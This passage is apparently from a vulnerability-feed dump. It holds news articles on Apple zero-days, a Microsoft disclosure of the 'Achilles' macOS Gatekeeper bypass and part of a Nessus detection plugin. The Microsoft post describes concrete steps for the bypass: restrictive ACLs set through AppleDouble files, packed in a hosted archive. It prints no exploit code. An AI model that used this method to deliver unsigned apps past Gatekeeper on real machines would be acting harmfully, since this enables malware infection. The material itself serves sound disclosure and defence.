The timing of the update also raises questions about whether the zero-day had any role in compromising iPhones using NSO Group's [Pegasus software](<https://forbiddenstories.org/case/the-pegasus-project/>), which has become the focus of a series of [investigative reports](<https://thehackernews.com/2021/07/new-leak-reveals-abuse-of-pegasus.html>) that have exposed how the spyware tool turned the mobile phones of journalists, human rights activists, and others into portable surveillance devices, granting complete access to sensitive information stored on them.

CVE-2021-30807 is also the thirteenth zero-day vulnerability addressed by Apple this year alone, the earlier ones being:

 * [CVE-2021-1782](<https://thehackernews.com/2021/01/apple-warns-of-3-ios-zero-day-security.html>) (Kernel) - A malicious application may be able to elevate privileges
 * [CVE-2021-1870](<https://thehackernews.com/2021/01/apple-warns-of-3-ios-zero-day-security.html>) (WebKit) - A remote attacker may be able to cause arbitrary code execution
 * [CVE-2021-1871](<https://thehackernews.com/2021/01/apple-warns-of-3-ios-zero-day-security.html>) (WebKit) - A remote attacker may be able to cause arbitrary code execution
 * [CVE-2021-1879](<https://thehackernews.com/2021/03/apple-issues-urgent-patch-update-for.html>) (WebKit) - Processing maliciously crafted web content may lead to universal cross-site scripting
 * [CVE-2021-30657](<https://thehackernews.com/2021/04/hackers-exploit-0-day-gatekeeper-flaw.html>) (System Preferences) - A malicious application may bypass Gatekeeper checks
 * [CVE-2021-30661](<https://thehackernews.com/2021/04/hackers-exploit-0-day-gatekeeper-flaw.html>) (WebKit Storage) - Processing maliciously crafted web content may lead to arbitrary code execution
 * [CVE-2021-30663](<https://thehackernews.com/2021/05/apple-releases-urgent-security-patches.html>) (WebKit) - Processing maliciously crafted web content may lead to arbitrary code execution
 * [CVE-2021-30665](<https://thehackernews.com/2021/05/apple-releases-urgent-security-patches.html>) (WebKit) - Processing maliciously crafted web content may lead to arbitrary code execution
 * [CVE-2021-30666](<https://thehackernews.com/2021/05/apple-releases-urgent-security-patches.html>) (WebKit) - Processing maliciously crafted web content may lead to arbitrary code execution
 * [CVE-2021-30713](<https://thehackernews.com/2021/05/apple-issues-patches-to-combat-ongoing.html>) (TCC framework) - A malicious application may be able to bypass Privacy preferences
 * [CVE-2021-30761](<https://thehackernews.com/2021/06/apple-issues-urgent-patches-for-2-zero.html>) (WebKit) - Processing maliciously crafted web content may lead to arbitrary code execution
 * [CVE-2021-30762](<https://thehackernews.com/2021/06/apple-issues-urgent-patches-for-2-zero.html>) (WebKit) - Processing maliciously crafted web content may lead to arbitrary code execution

Given the [public availability](<https://twitter.com/b1n4r1b01/status/1419734027565617165>) of a proof-of-concept (PoC) exploit, it's highly recommended that users move quickly to update their devices to the latest version to mitigate the risk associated with the flaw.
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-27T07:28:00", "type": "thn", "title": "Apple Releases Urgent 0-Day Bug Patch for Mac, iPhone and iPad Devices", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1782", "CVE-2021-1870", "CVE-2021-1871", "CVE-2021-1879", "CVE-2021-30657", "CVE-2021-30661", "CVE-2021-30663", "CVE-2021-30665", "CVE-2021-30666", "CVE-2021-30713", "CVE-2021-30761", "CVE-2021-30762", "CVE-2021-30807"], "modified": "2021-07-27T11:14:04", "id": "THN:080F85D43290560CDED8F282EE277B00", "href": "https://thehackernews.com/2021/07/apple-releases-urgent-0-day-bug-patch.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:14", "description": 
"Apple on Monday released a security update for iOS and iPadOS to address a critical vulnerability that it says is being exploited in the wild, making it the 17th zero-day flaw the company has addressed in its products since the start of the year.

The weakness, assigned the identifier [CVE-2021-30883](<https://support.apple.com/en-us/HT212846>), concerns a memory corruption issue in the "IOMobileFrameBuffer" component that could allow an application to execute arbitrary code with kernel privileges. Crediting an anonymous researcher for reporting the vulnerability, Apple said it's "aware of a report that this issue may have been actively exploited."

Technical specifics about the flaw and the nature of the attacks remain unavailable as yet, as is the identity of the threat actor, so as to allow a majority of users to apply the patch and prevent other adversaries from weaponizing the vulnerability. The iPhone maker said it addressed the issue with improved memory handling.

But soon after the advisory was released, security researcher Saar Amar [shared](<https://saaramar.github.io/IOMFB_integer_overflow_poc/>) additional details and a proof-of-concept (PoC) exploit, noting that "this attack surface is highly interesting because it's accessible from the app sandbox (so it's great for jailbreaks) and many other processes, making it a good candidate for LPEs exploits in chains."

CVE-2021-30883 is also the second zero-day impacting IOMobileFrameBuffer after Apple addressed a similar, anonymously reported memory corruption issue (CVE-2021-30807) in July 2021, raising the possibility that the two flaws could be related. With the latest fix, the company has resolved a record 17 zero-days to date in 2021 alone:

 * [**CVE-2021-1782**](<https://thehackernews.com/2021/01/apple-warns-of-3-ios-zero-day-security.html>) (Kernel) - A malicious application may be able to elevate privileges
 * [**CVE-2021-1870**](<https://thehackernews.com/2021/01/apple-warns-of-3-ios-zero-day-security.html>) (WebKit) - A remote attacker may be able to cause arbitrary code execution
 * [**CVE-2021-1871**](<https://thehackernews.com/2021/01/apple-warns-of-3-ios-zero-day-security.html>) (WebKit) - A remote attacker may be able to cause arbitrary code execution
 * [**CVE-2021-1879**](<https://thehackernews.com/2021/03/apple-issues-urgent-patch-update-for.html>) (WebKit) - Processing maliciously crafted web content may lead to universal cross-site scripting
 * [**CVE-2021-30657**](<https://thehackernews.com/2021/04/hackers-exploit-0-day-gatekeeper-flaw.html>) (System Preferences) - A malicious application may bypass Gatekeeper checks
 * [**CVE-2021-30661**](<https://thehackernews.com/2021/04/hackers-exploit-0-day-gatekeeper-flaw.html>) (WebKit Storage) - Processing maliciously crafted web content may lead to arbitrary code execution
 * [**CVE-2021-30663**](<https://thehackernews.com/2021/05/apple-releases-urgent-security-patches.html>) (WebKit) - Processing maliciously crafted web content may lead to arbitrary code execution
 * [**CVE-2021-30665**](<https://thehackernews.com/2021/05/apple-releases-urgent-security-patches.html>) (WebKit) - Processing maliciously crafted web content may lead to arbitrary code execution
 * [**CVE-2021-30666**](<https://thehackernews.com/2021/05/apple-releases-urgent-security-patches.html>) (WebKit) - Processing maliciously crafted web content may lead to arbitrary code execution
 * [**CVE-2021-30713**](<https://thehackernews.com/2021/05/apple-issues-patches-to-combat-ongoing.html>) (TCC framework) - A malicious application may be able to bypass Privacy preferences
 * [**CVE-2021-30761**](<https://thehackernews.com/2021/06/apple-issues-urgent-patches-for-2-zero.html>) (WebKit) - Processing maliciously crafted web content may lead to arbitrary code execution
 * [**CVE-2021-30762**](<https://thehackernews.com/2021/06/apple-issues-urgent-patches-for-2-zero.html>) (WebKit) - Processing maliciously crafted web content may lead to arbitrary code execution
 * [**CVE-2021-30807**](<https://thehackernews.com/2021/07/apple-releases-urgent-0-day-bug-patch.html>) (IOMobileFrameBuffer) - An application may be able to execute arbitrary code with kernel privileges
 * [**CVE-2021-30858**](<https://thehackernews.com/2021/09/apple-issues-urgent-updates-to-fix-new.html>) (WebKit) - Processing maliciously crafted web content may lead to arbitrary code execution
 * [**CVE-2021-30860**](<https://thehackernews.com/2021/09/apple-issues-urgent-updates-to-fix-new.html>) (CoreGraphics) - Processing a maliciously crafted PDF may lead to arbitrary code execution
 * [**CVE-2021-30869**](<https://thehackernews.com/2021/09/urgent-apple-ios-and-macos-updates.html>) (XNU) - A malicious application may be able to execute arbitrary code with kernel privileges

Apple iPhone and iPad users are highly recommended to update to the latest version (iOS 15.0.2 and iPadOS 15.0.2) to mitigate the security vulnerability.
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-12T02:41:00", "type": "thn", "title": "Apple Releases Urgent iPhone and iPad Updates to Patch New Zero-Day Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1782", "CVE-2021-1870", "CVE-2021-1871", "CVE-2021-1879", "CVE-2021-30657", "CVE-2021-30661", "CVE-2021-30663", "CVE-2021-30665", "CVE-2021-30666", "CVE-2021-30713", "CVE-2021-30761", "CVE-2021-30762", "CVE-2021-30807", "CVE-2021-30858", "CVE-2021-30860", "CVE-2021-30869", "CVE-2021-30883"], "modified": "2021-10-20T05:21:18", "id": "THN:BB8CDCFD08801BDD2929E342853D03E9", "href": "https://thehackernews.com/2021/10/apple-releases-urgent-iphone-and-ipad.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "mmpc": [{"lastseen": "2022-12-20T03:05:16", "description": "On July 27, 2022, Microsoft discovered a vulnerability in macOS that can allow attackers to bypass application execution restrictions imposed by Apple's Gatekeeper security mechanism, designed to ensure only trusted apps run on Mac devices. We developed a proof-of-concept exploit to demonstrate the vulnerability, which we call "Achilles". Gatekeeper bypasses such as this could be leveraged as a vector for initial access by malware and other threats and could help increase the success rate of malicious campaigns and attacks on macOS.

After carefully reviewing the implications, we shared the vulnerability with Apple in July 2022 through [Coordinated Vulnerability Disclosure](<https://www.microsoft.com/msrc/cvd?rtc=1>) (CVD) via [Microsoft Security Vulnerability Research](<https://www.microsoft.com/msrc/msvr>) (MSVR). Fixes for the vulnerability, now identified as [CVE-2022-42821](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42821>), were quickly released by Apple to all their OS versions. We note that Apple's [Lockdown Mode](<https://www.apple.com/newsroom/2022/07/apple-expands-commitment-to-protect-users-from-mercenary-spyware/>), introduced in macOS Ventura as an optional protection feature for high-risk users who might be personally targeted by a sophisticated cyberattack, is aimed at stopping zero-click remote code execution exploits and therefore does not defend against Achilles. End users should apply the fix regardless of their Lockdown Mode status. We thank Apple for the collaboration in addressing this issue.

In this blog post, we share information about [Gatekeeper](<https://support.apple.com/en-us/HT202491>) and the vulnerability able to bypass it. We also share this research to emphasize the importance of collaboration among researchers and the security community to improve defenses for the larger ecosystem.

## Unlocking the Gatekeeper security mechanism

Many macOS infections are the result of users running malware, oftentimes inadvertently.
Fake app bundles might masquerade as different apps, like Flash Player, or as a legitimate file, for example by using a PDF icon and the app name "Resume". To combat this highly popular infection vector, Apple has imposed strong security mechanisms. When downloading apps from a browser, like Safari, the browser assigns a special extended attribute to the downloaded file. That attribute is named _com.apple.quarantine_ and is later used to enforce policies such as Gatekeeper or certain mitigations that prevent [sandbox escapes](<https://www.microsoft.com/security/blog/2022/07/13/uncovering-a-macos-app-sandbox-escape-vulnerability-a-deep-dive-into-cve-2022-26706/>). In recent years, Apple has tightened the security policies even further, and the current Gatekeeper design dictates the following behavior for downloaded apps:

 1. If the app is validly signed and notarized, meaning approved by Apple, then a prompt requires the user's consent before it's launched.
 2. Otherwise, the user is informed that the app cannot be run as it's untrusted.

Extended attributes are a filesystem feature supported on common macOS filesystems, like APFS and HFS+, and their main purpose is to save file metadata. Specifically, the _com.apple.quarantine_ attribute saves information regarding the source of the downloaded file, as well as data instructing Gatekeeper how to process the file. The attribute format is generally:

    flag;date;agent_name;UUID

Extended attributes can be viewed or modified with the [_xattr_](<https://ss64.com/osx/xattr.html>) command line utility.

A flag value of "0083" enforces Gatekeeper restrictions on the file, as displayed below:

Figure 1. A common _com.apple.quarantine_ extended attribute value

Figure 2. Gatekeeper blocking an untrusted downloaded file

Due to its essential role in stopping malware on macOS, Gatekeeper is a helpful and effective security feature. However, considering there have been numerous bypass techniques targeting the security feature in the past, Gatekeeper is not bulletproof. Gaining the ability to bypass Gatekeeper has dire implications, as malware authors sometimes leverage those techniques for initial access.

## Historical overview of Gatekeeper bypasses

Numerous Gatekeeper bypasses have been identified in the past years, some even [abused by malware families](<https://www.bleepingcomputer.com/news/security/apple-fixes-macos-zero-day-bug-exploited-by-shlayer-malware/>) such as Shlayer. When examining Gatekeeper bypasses from recent years, we see two approaches:

 1. Misuse the _com.apple.quarantine_ extended attribute assignment.
 2. Find a vulnerability in the components that enforce policy checks on quarantined files.

Two cases that we don't consider to constitute a "true" Gatekeeper bypass are:

 1. Using unsupported filesystems, like a USB mass storage device using FAT32, as these require non-trivial user interaction to run macOS applications.
 2. MITRE's definition of "Gatekeeper Bypass" ([T1553.001](<https://attack.mitre.org/techniques/T1553/001/>)), which requires code execution to forcefully modify or remove the _com.apple.quarantine_ extended attribute.

Here are some examples of Gatekeeper bypass vulnerabilities discovered over the last several years:

| **Vulnerability** | **Exploits** | **Description** |
|---|---|---|
| **[CVE-2022-22616](<https://nvd.nist.gov/vuln/detail/CVE-2022-22616>)** | Assignment of the quarantine attribute. | Gzip files archived in BOM archives are not assigned the quarantine extended attribute, further detailed [here](<https://jhftss.github.io/CVE-2022-22616-Gatekeeper-Bypass/>). |
| **[CVE-2021-1810](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1810>)** | Assignment of the quarantine attribute. | Paths longer than 886 characters were not assigned extended attributes. Therefore, creating a symbolic link that points to an app that resides in a long path results in a Gatekeeper bypass. Since symbolic links are not assigned the quarantine attribute, it was possible to completely bypass Gatekeeper, as outlined [here](<https://labs.withsecure.com/blog/the-discovery-of-cve-2021-1810/>). |
| **[CVE-2021-30657](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30657>)** | Component(s) that enforce policy checks. | App bundles with a missing _Info.plist_ and a shell script main executable component are treated incorrectly by _syspolicyd_, a component that enforces policy restrictions on apps. Writeups can be found [here](<https://cedowens.medium.com/macos-gatekeeper-bypass-2021-edition-5256a2955508>) and [here](<https://objective-see.org/blog/blog_0x64.html>). |
| **[CVE-2021-30853](<https://nvd.nist.gov/vuln/detail/CVE-2021-30853>)** | Component(s) that enforce policy checks. | A security bug in the way files with a "_Shebang_" (#!) header are interpreted by _syspolicyd_ causes it to consider the app bundle to be safe, as detailed [here](<https://objective-see.org/blog/blog_0x6A.html>). |
| **[CVE-2019-8656](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8656>)** | Assignment of the quarantine attribute. | Since symbolic links are not assigned the quarantine extended attribute, an archive that contains a symbolic link to an app that resides in an external filesystem (NFS) results in a Gatekeeper bypass. Apple fixed the issue by blocking the execution of applications from remote shared locations, documented [here](<https://www.fcvl.net/vulnerabilities/macosx-gatekeeper-bypass>). |
| **[CVE-2014-8826](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8826>)** | Component(s) that enforce policy checks. | Quarantine attributes are not checked for JAR files, which are run by Java, as summarized [here](<https://www.ampliasecurity.com/advisories/os-x-gatekeeper-bypass-vulnerability.html>). |

## Metadata persistence over AppleDouble

Intrigued by [CVE-2021-1810](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1810>), as listed in the above table, we wondered what mechanism could be leveraged in archives. Considering that symbolic links are preserved in archives and aren't assigned quarantine attributes, we looked for a mechanism that could persist different kinds of metadata over archives.

After some investigation, we discovered a way to persist important file metadata through a mechanism called AppleDouble.

Even though extended attributes are common on different filesystems, they might be implemented differently or not supported at all, so copying files with their metadata becomes a challenging task. To solve this problem, [back in 1994](<https://www.rfc-editor.org/rfc/rfc1740.txt>), Apple introduced the AppleSingle and AppleDouble formats. In a nutshell, AppleSingle is a binary blob that is added as a part of the original file contents so that there's only a "single" file to process, whereas AppleDouble saves the metadata in a separate file placed side by side with the original file, with a "._" prefix.

Interestingly, when extracting an archive, macOS processes any attached AppleDouble file and assigns the target file the appropriate metadata.

The AppleDouble binary file format is quite complicated, but the code that parses it can be read in the XNU git repository in [the file](<https://github.com/apple/darwin-xnu/blob/main/bsd/vfs/vfs_xattr.c>) that handles extended attributes, which also includes an ASCII-art depiction of the format. To demonstrate the AppleDouble file information, we used the [_ditto_](<https://ss64.com/osx/ditto.html>) utility as such:

Figure 3. AppleDouble file created as "._somefile"

When the file is archived alongside its original file and then extracted by macOS, extended attributes are fully restored, as demonstrated here:

Figure 4. Using AppleDouble in a zip file to preserve extended attributes

Using this newfound knowledge, we examined how we could use the AppleDouble mechanism to trick Gatekeeper in some way.

Our first approach was to generate many large extended attributes in the AppleDouble format such that there wouldn't be enough space to assign the _com.apple.quarantine_ extended attribute. Interestingly, it doesn't work: AppleDouble is ignored if the overall size is over 2 GB, and there is no limitation on the number of extended attributes a file can get (besides the size of the disk).

Researching further, we decided to examine the [source code](<https://opensource.apple.com/source/Libc/Libc-391/darwin/copyfile.c.auto.html>) of the unarchiving mechanism. Carefully studying the _copyfile_unpack_ implementation, we discovered an option for a special extended attribute named _com.apple.acl.text_ (saved in the _XATTR_SECURITY_NAME_ constant in the source code), which is used to set arbitrary Access Control Lists.

Figure 5. The code that allows setting arbitrary Access Control Lists

## Using ACLs for exploitation

Access Control Lists (ACLs) are a mechanism in macOS that further extends the traditional permission model. The traditional permission model saves the permissions for each file in a file "mode", which can be changed by using the [_chmod_](<https://ss64.com/osx/chmod.html>) utility. It enforces permissions on the owning user, owning group, and others in terms of reading (r), writing (w) and launching (x). A file's mode can be viewed by listing files with the "_-l_" (long) flag:

Figure 6. Viewing the "hello.sh" file mode; the owner can do anything while others can only read or launch it

Unlike the traditional permission mechanism, ACLs allow fine-grained permissions on files and directories. Each ACL has one or more Access Control Entries (ACEs) that dictate what each principal can or cannot do, much like firewall rules.
Like the file mode, ACLs can be modified with the _chmod_ utility and viewed with the _ls_ utility. It's important to note that file access checks are dictated by both ACLs and the traditional permission model, as demonstrated by the following example:

Figure 7. Denying file reads from everyone makes it impossible to read the file despite its mode

The set of authorizations supported by ACLs is well documented by Apple in the _chmod_ manual, which contains more than the traditional reading, writing, or launching abilities, including:

 * _writeattr_: controls the ability to write attributes to the file
 * _writeextattr_: controls the ability to write extended attributes to the file
 * _writesecurity_: controls the ability to set ACLs on the file
 * _chown_: controls the ability to set the owner of the file
 * _delete_: controls the ability to delete the file

Equipped with this information, we decided to add very restrictive ACLs to the downloaded files. Those ACLs prohibit Safari (or any other program) from setting new extended attributes, including the _com.apple.quarantine_ attribute.

Two minor challenges that we had to overcome during the proof-of-concept (POC) development were:

 * The format of the ACL text as saved in the AppleDouble file isn't identical to the format of the _chmod_ command line. This can easily be overcome by invoking the macOS [_acl_to_text_](<https://developer.apple.com/library/archive/documentation/System/Conceptual/ManPages_iPhoneOS/man3/acl_to_text.3.html>) API and saving the ACL in the correct format.
 * When using the _ditto_ utility, the _com.apple.acl.text_ extended attribute is lost in the resulting AppleDouble file. This can be overcome by either manually creating the binary AppleDouble or, as we chose in this case, simply patching the resulting AppleDouble file before archiving it.

Therefore, our POC is as follows:

 1. Create a fake directory structure with an arbitrary icon and payload.
 2. Create an AppleDouble file with the _com.apple.acl.text_ extended attribute key and a value that represents a restrictive ACL (we chose the equivalent of "_everyone deny write,writeattr,writeextattr,writesecurity,chown_"). Perform the correct AppleDouble patching if using _ditto_ to generate the AppleDouble file.
 3. Create an archive with the application alongside its AppleDouble file and host it on a web server.

We named our POC exploit Achilles after its use of ACLs to bypass Gatekeeper. Our recorded POC video can be viewed here:

The AppleDouble file we used for this Gatekeeper bypass can be generated as displayed below:

Figure 8. Generic AppleDouble file that can be used for any Gatekeeper bypass

## Improving security for all through research and threat intelligence sharing

The threat landscape continues to evolve, delivering new threats and attack capabilities that take advantage of unpatched vulnerabilities and misconfigurations as a vector to access systems and data. Our data shows that fake apps remain one of the top entry vectors on macOS, indicating that Gatekeeper bypass techniques are an attractive and even a necessary capability for adversaries to leverage in attacks. Nonetheless, through research-driven protections and collaboration with customers, partners, and industry experts, we strive to enrich our protection technologies to defend against such issues, regardless of the platform or device in use.

As environments continue to rely on a diverse range of devices and operating systems, organizations need security solutions that can provide protection across platforms and a complete picture of their security posture. Collaborative research such as this informs our comprehensive protection capabilities across platforms, allowing [Microsoft Defender for Endpoint](<https://www.microsoft.com/security/business/endpoint-security/microsoft-defender-endpoint?rtc=1>) to deliver and coordinate threat defense across all major OS platforms including Windows, macOS, Linux, Android, and iOS. On macOS devices, Microsoft Defender for Endpoint detects and exposes threats and vulnerabilities, including CVE-2022-42821, using antivirus, endpoint detection and response (EDR), and threat and vulnerability management capabilities. This research also improved [Microsoft Defender's Vulnerability Management](<https://docs.microsoft.com/microsoft-365/security/defender-vulnerability-management/defender-vulnerability-management-capabilities?view=o365-worldwide>) capabilities to discover, prioritize, and remediate misconfigurations and vulnerabilities. This includes detecting CVE-2022-42821 on [macOS devices](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/microsoft-defender-endpoint-mac?view=o365-worldwide>) by examining AppleDouble files misusing ACLs.

This case also emphasized the need for responsible vulnerability disclosures and expert, cross-platform collaboration to effectively mitigate issues, protecting users against present and future threats. We wish to again thank the Apple product security team for their efforts and responsiveness in addressing the issue.

Figure 9. Detection by Microsoft Defender for Endpoint

Our Microsoft security researchers continue to discover new threats and vulnerabilities as part of our effort to secure users' computing experiences, be it on a Windows or non-Windows device. In the effort to improve security for all, we will continue to share intelligence and work with the security community to create and improve upon solutions that protect users and organizations across platforms every single day.

**Jonathan Bar Or**

Microsoft 365 Defender Research Team

The post [Gatekeeper's Achilles heel: Unearthing a macOS vulnerability](<https://www.microsoft.com/en-us/security/blog/2022/12/19/gatekeepers-achilles-heel-unearthing-a-macos-vulnerability/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/en-us/security/blog>).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2022-12-19T18:00:00", "type": "mmpc", "title": "Gatekeeper's Achilles heel: Unearthing a macOS vulnerability", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8826", "CVE-2019-8656", "CVE-2021-1810", "CVE-2021-30657", "CVE-2021-30853", "CVE-2022-22616", "CVE-2022-26706", "CVE-2022-42821"], "modified": "2022-12-19T18:00:00", "id": "MMPC:447DB6FB8D54C72486ECF54472FDAD42", "href": 
"https://www.microsoft.com/en-us/security/blog/2022/12/19/gatekeepers-achilles-heel-unearthing-a-macos-vulnerability/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "nessus": [{"lastseen": "2023-05-19T15:07:28", "description": "The remote host is running a version of macOS / Mac OS X that is 10.15.x prior to 10.15.7 Security Update 2021-002 Catalina It is, therefore, affected by multiple vulnerabilities, including the following:\n\n - An application may be able to execute arbitrary code with system privileges due to insufficient permission checks (CVE-2020-3838).\n\n - A memory corruption vulnerability could allow an application read access to restricted memory (CVE-2021-1808).\n\n - A memory corruption vulnerability could allow an application to cause unexpected system termination or to write kernel memory (CVE-2021-1828).\n\nNote that Nessus has not tested for this issue but has instead relied only on the operating system's self-reported version number.", "cvss3": {}, "published": "2021-04-28T00:00:00", "type": "nessus", "title": "macOS 10.15.x < 10.15.7 Security Update 2021-002 Catalina (HT212326)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-27942", "CVE-2020-3838", "CVE-2020-8037", "CVE-2020-8285", "CVE-2020-8286", "CVE-2021-1739", "CVE-2021-1740", "CVE-2021-1784", "CVE-2021-1797", "CVE-2021-1808", "CVE-2021-1809", "CVE-2021-1810", "CVE-2021-1811", "CVE-2021-1813", "CVE-2021-1824", "CVE-2021-1828", "CVE-2021-1834", "CVE-2021-1839", "CVE-2021-1840", "CVE-2021-1843", "CVE-2021-1847", "CVE-2021-1851", "CVE-2021-1857", "CVE-2021-1860", "CVE-2021-1868", "CVE-2021-1873", "CVE-2021-1875", "CVE-2021-1876", "CVE-2021-1878", "CVE-2021-1881", "CVE-2021-1882", "CVE-2021-30652", "CVE-2021-30657"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x", "cpe:/o:apple:macos"], "id": "MACOS_HT212326.NASL", "href": "https://www.tenable.com/plugins/nessus/149042", "sourceData": "##\n# (C) Tenable Network Security, 
Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(149042);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\n \"CVE-2020-3838\",\n \"CVE-2020-8037\",\n \"CVE-2020-8285\",\n \"CVE-2020-8286\",\n \"CVE-2020-27942\",\n \"CVE-2021-1739\",\n \"CVE-2021-1740\",\n \"CVE-2021-1784\",\n \"CVE-2021-1797\",\n \"CVE-2021-1808\",\n \"CVE-2021-1809\",\n \"CVE-2021-1810\",\n \"CVE-2021-1811\",\n \"CVE-2021-1813\",\n \"CVE-2021-1824\",\n \"CVE-2021-1828\",\n \"CVE-2021-1834\",\n \"CVE-2021-1839\",\n \"CVE-2021-1840\",\n \"CVE-2021-1843\",\n \"CVE-2021-1847\",\n \"CVE-2021-1851\",\n \"CVE-2021-1857\",\n \"CVE-2021-1860\",\n \"CVE-2021-1868\",\n \"CVE-2021-1873\",\n \"CVE-2021-1875\",\n \"CVE-2021-1876\",\n \"CVE-2021-1878\",\n \"CVE-2021-1881\",\n \"CVE-2021-1882\",\n \"CVE-2021-30652\",\n \"CVE-2021-30657\"\n );\n script_xref(name:\"APPLE-SA\", value:\"HT212326\");\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2021-04-26-3\");\n script_xref(name:\"IAVA\", value:\"2021-A-0202-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n\n script_name(english:\"macOS 10.15.x < 10.15.7 Security Update 2021-002 Catalina (HT212326)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a macOS security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of macOS / Mac OS X that is 10.15.x prior to 10.15.7 Security Update 2021-002 Catalina\nIt is, therefore, affected by multiple vulnerabilities, including the following:\n\n - An application may be able to execute arbitrary code with system privileges due to insufficient permission\n checks (CVE-2020-3838).\n\n - A memory corruption vulnerability could allow an application read access to restricted memory (CVE-2021-1808).\n\n - A memory corruption vulnerability could 
allow an application to cause unexpected system termination or to \n write kernel memory (CVE-2021-1828).\n\nNote that Nessus has not tested for this issue but has instead relied only on the operating system's self-reported\nversion number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT212326\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to macOS 10.15.7 Security Update 2021-002 Catalina or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-1834\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-1882\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'macOS Gatekeeper check bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/04/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/26\");\n 